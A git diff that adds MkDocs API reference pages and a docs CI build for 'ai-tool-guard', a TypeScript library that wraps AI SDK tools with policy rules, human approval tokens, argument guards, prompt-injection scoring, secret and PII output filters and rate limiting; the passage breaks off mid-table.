diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 609d1d0..0065e37 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -25,3 +25,14 @@ jobs: - run: npm run lint - run: npm test - run: npm run build + + docs: + name: Documentation Build + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-python@v5 + with: + python-version: "3.12" + - run: pip install -r docs/requirements.txt + - run: mkdocs build --strict diff --git a/.gitignore b/.gitignore index bf0eeed..e4f8cea 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ dist/ .env .env.* coverage/ +site/ diff --git a/.readthedocs.yaml b/.readthedocs.yaml new file mode 100644 index 0000000..77af0b8 --- /dev/null +++ b/.readthedocs.yaml @@ -0,0 +1,13 @@ +version: 2 + +build: + os: ubuntu-24.04 + tools: + python: "3.12" + +mkdocs: + configuration: mkdocs.yml + +python: + install: + - requirements: docs/requirements.txt diff --git a/README.md b/README.md index 87d76e5..bfe63ea 100644 --- a/README.md +++ b/README.md @@ -58,27 +58,27 @@ const result = await generateText({ ## Features -| Feature | Description | Requirement | -|---------|-------------|-------------| -| **Policy engine** | Rule-based allow/deny/require-approval with glob patterns, risk levels, priorities, and async conditions | #1 | -| **External policy backends** | Adapter interface for OPA/Rego, Cedar, or custom ABAC engines | #1 | -| **Decision records** | Structured audit output for every evaluation (matched rules, risk category, attributes, redactions) | #2 | -| **Dry-run / simulation** | Evaluate policies across recorded traces without executing tools | #3 | -| **Conversation-aware policies** | Policies can incorporate session risk score, prior failures, recent approvals | #4 | -| **Approve with edits** | Approval handler can patch arguments before execution | #5 | -| **Approval correlation** | Payload-hash tokens with TTL prevent mismatch between request and resolution | #6 | 
-| **Argument guards** | Zod schemas, allowlists, denylists, regex, PII scanning per field | #8 | -| **Injection detection** | Heuristic prompt-injection detector that can deny or downgrade to approval | #9 | -| **Output filtering** | Secrets stripping, PII redaction, custom filters on tool results | #10 | -| **Rate limiting** | Sliding-window rate limits + concurrency caps with reject or queue backpressure | #11 | -| **OpenTelemetry** | Opinionated spans for policy eval, approval wait, tool execution, redaction | #12 | -| **MCP drift detection** | SHA-256 schema fingerprinting, drift detection, actionable remediation | #15 | +| Feature | Description | +|---------|-------------| +| **Policy engine** | Rule-based allow/deny/require-approval with glob patterns, risk levels, priorities, and async conditions | +| **External policy backends** | Adapter interface for OPA/Rego, Cedar, or custom ABAC engines | +| **Decision records** | Structured audit output for every evaluation (matched rules, risk category, attributes, redactions) | +| **Dry-run / simulation** | Evaluate policies across recorded traces without executing tools | +| **Conversation-aware policies** | Policies can incorporate session risk score, prior failures, recent approvals | +| **Approve with edits** | Approval handler can patch arguments before execution | +| **Approval correlation** | Payload-hash tokens with TTL prevent mismatch between request and resolution | +| **Argument guards** | Zod schemas, allowlists, denylists, regex, PII scanning per field | +| **Injection detection** | Heuristic prompt-injection detector that can deny or downgrade to approval | +| **Output filtering** | Secrets stripping, PII redaction, custom filters on tool results | +| **Rate limiting** | Sliding-window rate limits + concurrency caps with reject or queue backpressure | +| **OpenTelemetry** | Opinionated spans for policy eval, approval wait, tool execution, redaction | +| **MCP drift detection** | SHA-256 schema 
fingerprinting, drift detection, actionable remediation | ## Architecture ``` ┌─────────────────────────────────────────┐ - │ createToolGuard(options) │ + │ createToolGuard(options) │ └──────────────┬──────────────────────────┘ │ ┌──────────────────────┼──────────────────────┐ @@ -90,7 +90,7 @@ const result = await generateText({ ┌─── Execution Pipeline ───┐ │ │ │ │ │ 1. Injection detection │ ┌──────────┴─────┐ - │ 2. Argument validation │ │ PolicyBackend │ + │ 2. Argument validation │ │ PolicyBackend │ │ 3. Policy evaluation ◄──┼─────┤ (OPA, Cedar) │ │ 4. Approval flow │ └────────────────┘ │ 5. Rate limiting │ @@ -565,14 +565,14 @@ try { } catch (err) { if (err instanceof ToolGuardError) { switch (err.code) { - case "policy-denied": // Policy rule blocked the call - case "approval-denied": // Human denied approval - case "no-approval-handler": // Approval required but no handler set + case "policy-denied": // Policy rule blocked the call + case "approval-denied": // Human denied approval + case "no-approval-handler": // Approval required but no handler set case "arg-validation-failed": // Argument guard failed - case "injection-detected": // Prompt injection suspected - case "rate-limited": // Rate limit exceeded - case "output-blocked": // Output filter blocked the result - case "mcp-drift": // MCP schema drift detected + case "injection-detected": // Prompt injection suspected + case "rate-limited": // Rate limit exceeded + case "output-blocked": // Output filter blocked the result + case "mcp-drift": // MCP schema drift detected } console.log(err.toolName); // Which tool console.log(err.decision); // Full DecisionRecord (if available) diff --git a/docs/api/approval.md b/docs/api/approval.md new file mode 100644 index 0000000..58732dd --- /dev/null +++ b/docs/api/approval.md @@ -0,0 +1,156 @@ +# Approval — `ai-tool-guard/approval` + +The approval module manages the lifecycle of human-in-the-loop approval requests. 
+It creates correlation tokens, enforces TTL expiry, supports argument patching +("approve with edits"), and delegates the actual approval decision to a +caller-supplied handler. + +```ts +import { ApprovalManager } from "ai-tool-guard/approval"; +import type { ApprovalFlowResult } from "ai-tool-guard/approval"; +``` + +The related types `ApprovalToken`, `ApprovalResolution`, and `ApprovalHandler` are +defined in `ai-tool-guard/types` and re-exported from the root path. + +```ts +import type { + ApprovalToken, + ApprovalResolution, + ApprovalHandler, +} from "ai-tool-guard"; +``` + +--- + +## Classes + +### `ApprovalManager` + +Manages the full lifecycle of approval tokens: creation, handler invocation, TTL +enforcement, and resolution. + +#### Constructor + +```ts +new ApprovalManager(handler: ApprovalHandler, defaultTtlMs?: number) +``` + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `handler` | `ApprovalHandler` | Yes | Async callback invoked with the approval token; must return an `ApprovalResolution` | +| `defaultTtlMs` | `number` | No | Token time-to-live in milliseconds. Default: `300000` (5 minutes) | + +#### Methods + +##### `requestApproval` + +```ts +async requestApproval(ctx: PolicyContext): Promise<ApprovalFlowResult> +``` + +Create an approval token for a tool call and invoke the handler. The token +includes a SHA-256 hash of the call payload for correlation. Tokens are +automatically removed from the pending set after the handler resolves. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `ctx` | `PolicyContext` | Yes | Policy context of the tool call requiring approval | + +**Returns** `Promise<ApprovalFlowResult>` + +The result indicates whether the call was approved, the final arguments to use +(original or patched), and optional metadata from the approver. + +##### `getPendingTokens` + +```ts +getPendingTokens(): ReadonlyArray<ApprovalToken> +``` + +Return a read-only snapshot of currently pending approval tokens. Useful for +rendering an approval UI. 
+ +**Returns** `ReadonlyArray<ApprovalToken>` + +--- + +## Interfaces + +### `ApprovalFlowResult` + +The complete result of a single approval flow cycle returned by +`requestApproval()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the tool call was approved | +| `tokenId` | `string` | Yes | The approval token ID for correlation and auditing | +| `args` | `Record<string, unknown>` | Yes | The final arguments to pass to the tool (original or patched by the approver) | +| `patchedFields` | `string[]` | No | Names of argument fields that were modified by the approver | +| `approvedBy` | `string` | No | Identity of the approver, if provided by the handler | +| `reason` | `string` | No | Human-readable reason for denial, if the call was not approved | +| `error` | `string` | No | Error message if the approval flow itself failed (e.g., token not found or expired) | + +--- + +## Types (from `ai-tool-guard`) + +### `ApprovalToken` + +Correlation token sent to the `ApprovalHandler`. Contains a snapshot of the +original arguments and a payload hash for tamper detection. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Randomly generated unique token ID | +| `payloadHash` | `string` | Yes | SHA-256 hash of the canonical `{ toolName, args }` payload | +| `toolName` | `string` | Yes | Name of the tool awaiting approval | +| `originalArgs` | `Record<string, unknown>` | Yes | Snapshot of the tool arguments at request time | +| `createdAt` | `string` | Yes | ISO-8601 timestamp of token creation | +| `ttlMs` | `number` | No | Token time-to-live in milliseconds | + +--- + +### `ApprovalResolution` + +The response returned by the `ApprovalHandler` callback. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the tool call is approved | +| `patchedArgs` | `Record<string, unknown>` | No | Partial argument overrides; merged with `originalArgs` when provided | +| `approvedBy` | `string` | No | Identity of the approver for audit purposes | +| `reason` | `string` | No | Reason for denial when `approved` is `false` | + +--- + +### `ApprovalHandler` + +```ts +type ApprovalHandler = (token: ApprovalToken) => Promise<ApprovalResolution>; +``` + +Callback type the consumer implements to handle approval requests. The handler +receives the token, presents it to a human approver (or automated system), and +resolves with the decision. + +**Example** + +```ts +const handler: ApprovalHandler = async (token) => { + const decision = await showApprovalModal({ + toolName: token.toolName, + args: token.originalArgs, + }); + + return { + approved: decision.confirmed, + approvedBy: decision.userId, + patchedArgs: decision.edits, + reason: decision.reason, + }; +}; + +const guard = createToolGuard({ onApprovalRequired: handler }); +``` diff --git a/docs/api/core.md b/docs/api/core.md new file mode 100644 index 0000000..2b48b69 --- /dev/null +++ b/docs/api/core.md @@ -0,0 +1,280 @@ +# Core — `ai-tool-guard` + +The root import path is the primary integration point. It provides the guard +factory, the `ToolGuard` class, and the error type, together with re-exports of +every type defined in the library. + +```ts +import { createToolGuard, ToolGuard, ToolGuardError } from "ai-tool-guard"; +``` + +--- + +## Functions + +### `createToolGuard` + +```ts +function createToolGuard(options?: GuardOptions): ToolGuard +``` + +Create a `ToolGuard` instance. This is the recommended entry point. + +**Parameters** + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `options` | `GuardOptions` | No | Guard configuration. Defaults to an empty object (allow-all mode). 
| + +**Returns** `ToolGuard` + +**Example** + +```ts +const guard = createToolGuard({ + rules: [deny({ tools: "dangerousTool" })], + onApprovalRequired: async (token) => showModal(token), + otel: { enabled: true }, +}); +``` + +--- + +## Classes + +### `ToolGuard` + +Wraps Vercel AI SDK tools with policy enforcement, argument validation, approval +flows, rate limiting, output filtering, and telemetry. + +#### Constructor + +```ts +new ToolGuard(options: GuardOptions) +``` + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `options` | `GuardOptions` | Yes | Configuration for this guard instance | + +#### Methods + +##### `guardTool` + +```ts +guardTool<TArgs extends Record<string, unknown>, TResult>( + name: string, + tool: AiSdkTool<TArgs, TResult>, + config?: ToolGuardConfig, +): AiSdkTool<TArgs, TResult> +``` + +Wrap a single AI SDK tool with guard enforcement. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Tool name used in policy evaluation and error messages | +| `tool` | `AiSdkTool<TArgs, TResult>` | Yes | The original AI SDK tool object | +| `config` | `ToolGuardConfig` | No | Per-tool metadata: risk level, guards, rate limits, filters | + +**Returns** `AiSdkTool<TArgs, TResult>` — the wrapped tool, compatible with `generateText({ tools })`. + +If the tool has no `execute` function (e.g., a client-side tool), it is returned unchanged. + +##### `guardTools` + +```ts +guardTools<T extends Record<string, ToolWithConfig>>( + toolMap: T, +): { [K in keyof T]: AiSdkTool } +``` + +Wrap multiple tools at once. Accepts a map of `{ toolName: { tool, ...config } }` +and returns a flat `{ toolName: guardedTool }` map. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolMap` | `T extends Record<string, ToolWithConfig>` | Yes | Map of tool names to tool + config entries | + +**Returns** `{ [K in keyof T]: AiSdkTool }` — a map of guarded tools. 
+ +**Example** + +```ts +const tools = guard.guardTools({ + readFile: { tool: readFileTool, riskLevel: "low" }, + writeFile: { tool: writeFileTool, riskLevel: "high" }, + deleteFile: { tool: deleteFileTool, riskLevel: "critical" }, +}); + +const result = await generateText({ model, tools, prompt }); +``` + +--- + +### `ToolGuardError` + +Thrown by `ToolGuard` when a tool call is rejected at any stage of the pipeline. + +#### Constructor + +```ts +new ToolGuardError( + message: string, + code: ToolGuardErrorCode, + toolName: string, + decision?: DecisionRecord, +) +``` + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `message` | `string` | Yes | Human-readable error description | +| `code` | `ToolGuardErrorCode` | Yes | Machine-readable error code | +| `toolName` | `string` | Yes | Name of the tool that was blocked | +| `decision` | `DecisionRecord` | No | The policy decision record, if available | + +#### Properties + +| Property | Type | Description | +|---|---|---| +| `name` | `string` | Always `"ToolGuardError"` | +| `code` | `ToolGuardErrorCode` | Machine-readable code indicating the rejection reason | +| `toolName` | `string` | Name of the tool that was blocked | +| `decision` | `DecisionRecord \| undefined` | Policy decision record for the rejection, if applicable | + +**Example** + +```ts +try { + await generateText({ model, tools, prompt }); +} catch (err) { + if (err instanceof ToolGuardError) { + console.error(err.code, err.toolName, err.decision?.reason); + } +} +``` + +--- + +## Types + +### `ToolGuardErrorCode` + +```ts +type ToolGuardErrorCode = + | "policy-denied" + | "approval-denied" + | "no-approval-handler" + | "arg-validation-failed" + | "injection-detected" + | "rate-limited" + | "output-blocked" + | "mcp-drift"; +``` + +| Code | When thrown | +|---|---| +| `"policy-denied"` | A policy rule or backend returned `"deny"` | +| `"approval-denied"` | The approval handler rejected the request | +| `"no-approval-handler"` | 
Approval required but no `onApprovalRequired` handler configured | +| `"arg-validation-failed"` | One or more argument guards failed | +| `"injection-detected"` | Injection score exceeded threshold and action is `"deny"` | +| `"rate-limited"` | The tool exceeded its rate or concurrency limit | +| `"output-blocked"` | An output filter returned verdict `"block"` | +| `"mcp-drift"` | Tool schema differs from its pinned fingerprint | + +--- + +## Interfaces + +### `GuardOptions` + +Top-level configuration object passed to `createToolGuard()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `rules` | `PolicyRule[]` | No | Built-in policy rules evaluated against every tool call | +| `backend` | `PolicyBackend` | No | External policy backend (OPA, Cedar, custom); evaluated before built-in rules | +| `defaultRiskLevel` | `RiskLevel` | No | Fallback risk level for tools without explicit config. Default: `"low"` | +| `onApprovalRequired` | `ApprovalHandler` | No | Callback invoked when a tool requires human approval | +| `injectionDetection` | `InjectionDetectorConfig` | No | Global injection detection settings | +| `defaultRateLimit` | `RateLimitConfig` | No | Default rate limit applied to all tools | +| `defaultMaxConcurrency` | `number` | No | Default concurrency cap applied to all tools | +| `otel` | `OtelConfig` | No | OpenTelemetry tracing configuration | +| `dryRun` | `boolean` | No | When `true`, policy is evaluated but tools are not executed | +| `onDecision` | `(record: DecisionRecord) => void \| Promise` | No | Callback fired for every policy decision (allow, deny, or approval) | +| `resolveUserAttributes` | `() => Record \| Promise>` | No | Resolver called per invocation to supply user attributes for policy context | +| `resolveConversationContext` | `() => ConversationContext \| Promise` | No | Resolver called per invocation to supply conversation metadata | + +--- + +### `ToolGuardConfig` + +Per-tool metadata attached via `guardTool()` or the 
`guardTools()` input map. + +| Field | Type | Required | Description | +|---|---|---|---| +| `riskLevel` | `RiskLevel` | No | Risk level of this tool (`"low"` \| `"medium"` \| `"high"` \| `"critical"`) | +| `riskCategories` | `RiskCategory[]` | No | Classification tags for audit and explainability | +| `rateLimit` | `RateLimitConfig` | No | Per-tool rate limit (overrides `defaultRateLimit`) | +| `maxConcurrency` | `number` | No | Per-tool concurrency cap (overrides `defaultMaxConcurrency`) | +| `argGuards` | `ArgGuard[]` | No | Argument-level validators run before policy evaluation | +| `outputFilters` | `OutputFilter[]` | No | Output filters applied after tool execution | +| `requireApproval` | `boolean` | No | Force approval regardless of policy verdict | +| `mcpFingerprint` | `string` | No | Expected schema hash; execution is blocked on mismatch | + +--- + +### `AiSdkTool` + +Minimal structural interface matching the Vercel AI SDK `tool()` return shape. +The library depends on this structural type rather than importing from `ai` +directly, so it works across AI SDK versions. + +```ts +interface AiSdkTool, TResult = unknown> { + description?: string; + parameters: unknown; // Zod schema + execute?: (args: TArgs, options: ToolExecuteOptions) => Promise; + [key: string]: unknown; +} +``` + +| Field | Type | Required | Description | +|---|---|---|---| +| `description` | `string` | No | Human-readable tool description | +| `parameters` | `unknown` | Yes | Zod schema describing the tool's arguments | +| `execute` | `(args: TArgs, options: ToolExecuteOptions) => Promise` | No | Tool implementation; absent for client-side tools | + +--- + +### `ToolExecuteOptions` + +Options forwarded to a tool's `execute` function by the AI SDK runtime. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `toolCallId` | `string` | Yes | Unique identifier for this tool call invocation | +| `messages` | `unknown[]` | No | Conversation message history | +| `abortSignal` | `AbortSignal` | No | Signal to abort the tool call | + +Additional keys are permitted (index signature `[key: string]: unknown`). + +--- + +### `ToolWithConfig` + +Input entry shape for `guardTools()`. Extends `ToolGuardConfig` with a required +`tool` field. + +```ts +interface ToolWithConfig extends ToolGuardConfig { + tool: AiSdkTool; +} +``` + +| Field | Type | Required | Description | +|---|---|---|---| +| `tool` | `AiSdkTool` | Yes | The original AI SDK tool to wrap | +| *(all `ToolGuardConfig` fields)* | — | No | Guard configuration for this tool | diff --git a/docs/api/guards.md b/docs/api/guards.md new file mode 100644 index 0000000..8dfab49 --- /dev/null +++ b/docs/api/guards.md @@ -0,0 +1,430 @@ +# Guards — `ai-tool-guard/guards` + +The guards module provides four categories of runtime protection: argument-level +validation, prompt injection detection, output egress filtering, and rate limiting +with concurrency control. + +```ts +import { + zodGuard, + allowlist, + denylist, + regexGuard, + piiGuard, + evaluateArgGuards, + checkInjection, + secretsFilter, + piiOutputFilter, + customFilter, + runOutputFilters, + RateLimiter, +} from "ai-tool-guard/guards"; +``` + +--- + +## Argument Guards + +Argument guards run before policy evaluation and reject calls whose arguments +fail validation. + +### `zodGuard` + +```ts +function zodGuard(config: ZodArgGuard): ArgGuard +``` + +Create an `ArgGuard` backed by a Zod schema. The field value is parsed with +`schema.safeParse()`; any Zod issues are joined and returned as the failure +message. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `config.field` | `string` | Yes | Dot-path to the argument field (e.g. 
`"user.email"`) or `"*"` for the whole args object | +| `config.schema` | `z.ZodType` | Yes | Zod schema to validate the field value against | + +**Returns** `ArgGuard` + +**Example** + +```ts +import { z } from "zod"; + +const guard = zodGuard({ + field: "query", + schema: z.string().min(1).max(500), +}); +``` + +--- + +### `allowlist` + +```ts +function allowlist(field: string, allowed: readonly unknown[]): ArgGuard +``` + +Create an `ArgGuard` that rejects any value not present in the allowed list. +Comparison uses `Array.prototype.includes` (strict equality). + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to check | +| `allowed` | `readonly unknown[]` | Yes | Set of permitted values | + +**Returns** `ArgGuard` + +--- + +### `denylist` + +```ts +function denylist(field: string, denied: readonly unknown[]): ArgGuard +``` + +Create an `ArgGuard` that rejects any value present in the denied list. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to check | +| `denied` | `readonly unknown[]` | Yes | Set of forbidden values | + +**Returns** `ArgGuard` + +--- + +### `regexGuard` + +```ts +function regexGuard( + field: string, + pattern: RegExp, + opts?: { mustMatch?: boolean; message?: string }, +): ArgGuard +``` + +Create an `ArgGuard` that validates a string field against a regular expression. +Non-string values always fail. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to test | +| `pattern` | `RegExp` | Yes | Pattern to test against | +| `opts.mustMatch` | `boolean` | No | When `true`, the value must match. When `false`, matching is forbidden. 
Default: `true` | +| `opts.message` | `string` | No | Custom failure message | + +**Returns** `ArgGuard` + +--- + +### `piiGuard` + +```ts +function piiGuard( + field: string, + opts?: { allowedTypes?: string[] }, +): ArgGuard +``` + +Create an `ArgGuard` that scans a string field for common PII patterns. Detected +patterns are `"email"`, `"ssn"`, `"credit-card"`, `"phone-us"`, and +`"ip-address"`. Credit card numbers are additionally validated with a Luhn check. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Argument field to scan | +| `opts.allowedTypes` | `string[]` | No | PII type names to skip (e.g. `["email"]` to allow email addresses) | + +**Returns** `ArgGuard` + +--- + +### `evaluateArgGuards` + +```ts +async function evaluateArgGuards( + guards: ArgGuard[], + ctx: PolicyContext, +): Promise +``` + +Run all argument guards against the tool call context. Guards are evaluated in +order; all guards run even if earlier ones fail, collecting all violations. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `guards` | `ArgGuard[]` | Yes | Guards to evaluate | +| `ctx` | `PolicyContext` | Yes | Tool call context providing `args` and other metadata | + +**Returns** `Promise` + +--- + +## Injection Detection + +### `checkInjection` + +```ts +async function checkInjection( + ctx: PolicyContext, + config: InjectionDetectorConfig, +): Promise +``` + +Scan tool arguments for prompt injection patterns using either a built-in +heuristic detector or a custom scoring function. + +The built-in detector flattens all string values in `args` into a single text +blob and checks against patterns including instruction overrides, role hijacking, +delimiter injection, exfiltration attempts, and encoded payloads. It also flags +arguments with total string length exceeding 5,000 characters. 
+ +| Parameter | Type | Required | Description | +|---|---|---|---| +| `ctx` | `PolicyContext` | Yes | Tool call context | +| `config` | `InjectionDetectorConfig` | Yes | Detection configuration | + +**Returns** `Promise` + +--- + +## Output Filters + +Output filters run after tool execution and can redact or block the result before +it reaches the model. + +### `secretsFilter` + +```ts +function secretsFilter(extraRules?: RedactionRule[]): OutputFilter +``` + +Create an output filter that redacts common secrets from string output using +regex-based replacement. Built-in patterns cover AWS access keys, GitHub tokens, +JWTs, generic API keys, Bearer tokens, and PEM private keys. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `extraRules` | `RedactionRule[]` | No | Additional redaction rules appended to the built-in set | + +**Returns** `OutputFilter` + +--- + +### `piiOutputFilter` + +```ts +function piiOutputFilter(opts?: { allowedTypes?: string[] }): OutputFilter +``` + +Create an output filter that redacts PII from string output. Covers email +addresses, SSNs, US phone numbers, and credit card numbers (Luhn-validated). + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `opts.allowedTypes` | `string[]` | No | PII type names to skip: `"email"`, `"ssn"`, `"phone"`, `"credit-card"` | + +**Returns** `OutputFilter` + +--- + +### `customFilter` + +```ts +function customFilter( + name: string, + fn: (result: unknown, ctx: PolicyContext) => Promise, +): OutputFilter +``` + +Wrap an arbitrary async function as an `OutputFilter`. 
+ +| Parameter | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Identifier used in logging and `OutputFilterChainResult.blockedBy` | +| `fn` | `(result: unknown, ctx: PolicyContext) => Promise` | Yes | Filter implementation | + +**Returns** `OutputFilter` + +**Example** + +```ts +const classificationFilter = customFilter("classification", async (result, ctx) => { + const sensitive = await detectSensitiveData(result); + if (sensitive) { + return { verdict: "block", output: null }; + } + return { verdict: "pass", output: result }; +}); +``` + +--- + +### `runOutputFilters` + +```ts +async function runOutputFilters( + filters: OutputFilter[], + result: unknown, + ctx: PolicyContext, +): Promise +``` + +Execute a chain of output filters sequentially. Each filter receives the output +of the previous filter. If any filter returns verdict `"block"`, the chain stops +immediately and the result is suppressed. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `filters` | `OutputFilter[]` | Yes | Ordered list of filters to run | +| `result` | `unknown` | Yes | Raw tool output | +| `ctx` | `PolicyContext` | Yes | Tool call context forwarded to each filter | + +**Returns** `Promise` + +--- + +## Rate Limiting + +### `RateLimiter` + +Sliding-window rate limiter with per-tool state and optional concurrency control. +Supports two backpressure strategies: `"reject"` (return immediately with an +error) and `"queue"` (wait until a slot becomes available). + +#### Constructor + +```ts +new RateLimiter() +``` + +No constructor parameters. State is maintained internally per tool name. + +#### Methods + +##### `acquire` + +```ts +async acquire( + toolName: string, + config: RateLimitConfig, + maxConcurrency?: number, +): Promise +``` + +Attempt to acquire a rate limit slot for the given tool. + +- Slides the window by discarding timestamps older than `config.windowMs`. +- Checks call count against `config.maxCalls`. 
+- Checks active calls against `maxConcurrency` if provided. +- When `config.strategy === "queue"`, blocks until a slot is available instead + of returning `allowed: false`. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Tool identifier | +| `config` | `RateLimitConfig` | Yes | Rate limit settings | +| `maxConcurrency` | `number` | No | Maximum simultaneous active calls | + +**Returns** `Promise` + +##### `release` + +```ts +release(toolName: string): void +``` + +Decrement the active call counter after tool execution completes. Also wakes one +queued caller if any are waiting. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Tool identifier | + +##### `getState` + +```ts +getState(toolName: string): RateLimitState | undefined +``` + +Return a reference to the current sliding-window state for a tool. Returns +`undefined` if the tool has not yet been seen. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Tool identifier | + +**Returns** `RateLimitState | undefined` + +##### `reset` + +```ts +reset(): void +``` + +Clear all rate limit state and reject any queued waiters with an error. Intended +for testing. + +--- + +## Result Types + +### `ArgGuardResult` + +Returned by `evaluateArgGuards()`. + +| Field | Type | Description | +|---|---|---| +| `passed` | `boolean` | `true` when all guards passed (no violations) | +| `violations` | `Array<{ field: string; message: string }>` | List of validation failures with field path and reason | + +--- + +### `InjectionCheckResult` + +Returned by `checkInjection()`. 
+ +| Field | Type | Description | +|---|---|---| +| `score` | `number` | Suspicion score from 0 to 1 | +| `suspected` | `boolean` | `true` when `score >= config.threshold` | +| `action` | `"downgrade" \| "deny" \| "log"` | The configured action at detection time | +| `verdictOverride` | `DecisionVerdict` | How the policy verdict should be modified; `undefined` if no override | + +--- + +### `RedactionRule` + +Pattern-based redaction rule used by `secretsFilter()` and `piiOutputFilter()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Human-readable identifier for logging | +| `pattern` | `RegExp` | Yes | Regex to match sensitive content (should use the `g` flag for replacement) | +| `replacement` | `string` | No | Replacement string. Default: `"[REDACTED]"` | +| `validate` | `(match: string) => boolean` | No | Optional post-match validator; return `true` to confirm the match is real (used for Luhn checks) | + +--- + +### `OutputFilterChainResult` + +Returned by `runOutputFilters()`. + +| Field | Type | Description | +|---|---|---| +| `output` | `unknown` | The final (possibly filtered) tool output | +| `redactedFields` | `string[]` | All fields redacted across all filters, prefixed with the filter name (e.g. `"secrets-filter:aws-key"`) | +| `blocked` | `boolean` | `true` when a filter returned verdict `"block"` | +| `blockedBy` | `string` | Name of the filter that blocked the output; only present when `blocked` is `true` | + +--- + +### `RateLimitAcquireResult` + +Returned by `RateLimiter.acquire()`. 
+ +| Field | Type | Description | +|---|---|---| +| `allowed` | `boolean` | Whether the call is permitted to proceed | +| `reason` | `string` | Human-readable reason for rejection; only present when `allowed` is `false` | +| `retryAfterMs` | `number` | Milliseconds until the oldest window entry expires; only present on rate limit (not concurrency) rejection | diff --git a/docs/api/index.md b/docs/api/index.md new file mode 100644 index 0000000..fb40b01 --- /dev/null +++ b/docs/api/index.md @@ -0,0 +1,128 @@ +# API Reference + +This reference documents every public export from `ai-tool-guard`. The library is +distributed as a single npm package with six import paths, each focused on a +distinct concern. + +## Module map + +| Import path | Purpose | +|---|---| +| `ai-tool-guard` | Core guard factory, `ToolGuard` class, error types, and all re-exports | +| `ai-tool-guard/policy` | Policy rule builders, preset bundles, engine, and simulation | +| `ai-tool-guard/approval` | Approval lifecycle manager | +| `ai-tool-guard/guards` | Argument guards, injection detection, output filters, rate limiter | +| `ai-tool-guard/otel` | OpenTelemetry span helpers and semantic attribute constants | +| `ai-tool-guard/mcp` | MCP tool fingerprinting and drift detection | + +Everything exported by the five sub-paths is also re-exported from the root +`ai-tool-guard` path, so you can import everything from one place if you prefer: + +```ts +import { createToolGuard, allow, deny, secretsFilter, ATTR } from "ai-tool-guard"; +``` + +--- + +## Quick reference + +### Core (`ai-tool-guard`) + +| Export | Kind | Description | +|---|---|---| +| `createToolGuard` | function | Create a `ToolGuard` instance from options | +| `ToolGuard` | class | Wraps AI SDK tools with policy enforcement | +| `ToolGuardError` | class | Error thrown when a guard rejects a tool call | +| `ToolGuardErrorCode` | type | Union of 8 error code strings | +| `GuardOptions` | interface | Top-level configuration object | +| `ToolGuardConfig` | interface 
| Per-tool configuration metadata | +| `AiSdkTool` | interface | Minimal Vercel AI SDK tool shape | +| `ToolExecuteOptions` | interface | Options forwarded to the tool's execute function | +| `ToolWithConfig` | interface | `guardTools()` input entry: tool plus guard config | + +### Policy (`ai-tool-guard/policy`) + +| Export | Kind | Description | +|---|---|---| +| `evaluatePolicy` | function | Evaluate a tool call against rules and/or backend | +| `allow` | function | Build a rule that allows matching tools | +| `deny` | function | Build a rule that denies matching tools | +| `requireApproval` | function | Build a rule that requires approval | +| `defaultPolicy` | function | Preset: low=allow, medium=approval, high/critical=deny | +| `readOnlyPolicy` | function | Preset: allow listed patterns, deny everything else | +| `simulate` | function | Dry-run evaluation across a recorded trace | +| `PolicyRule` | interface | Atomic policy rule definition | +| `PolicyBackend` | interface | Adapter for external engines (OPA, Cedar) | +| `PolicyBackendResult` | interface | Result returned by a `PolicyBackend` | +| `PolicyContext` | interface | Context passed to every policy evaluation | +| `RecordedToolCall` | interface | A captured tool call for simulation | +| `SimulationResult` | interface | Aggregate result of a simulation run | + +### Approval (`ai-tool-guard/approval`) + +| Export | Kind | Description | +|---|---|---| +| `ApprovalManager` | class | Manages token lifecycle and handler invocation | +| `ApprovalFlowResult` | interface | Result of a full approval cycle | +| `ApprovalToken` | interface | Correlation token sent to the approval handler | +| `ApprovalResolution` | interface | Handler response (approved/denied/patched) | +| `ApprovalHandler` | type | Callback type for approval handlers | + +### Guards (`ai-tool-guard/guards`) + +| Export | Kind | Description | +|---|---|---| +| `zodGuard` | function | Create an `ArgGuard` from a Zod schema | +| `allowlist` | 
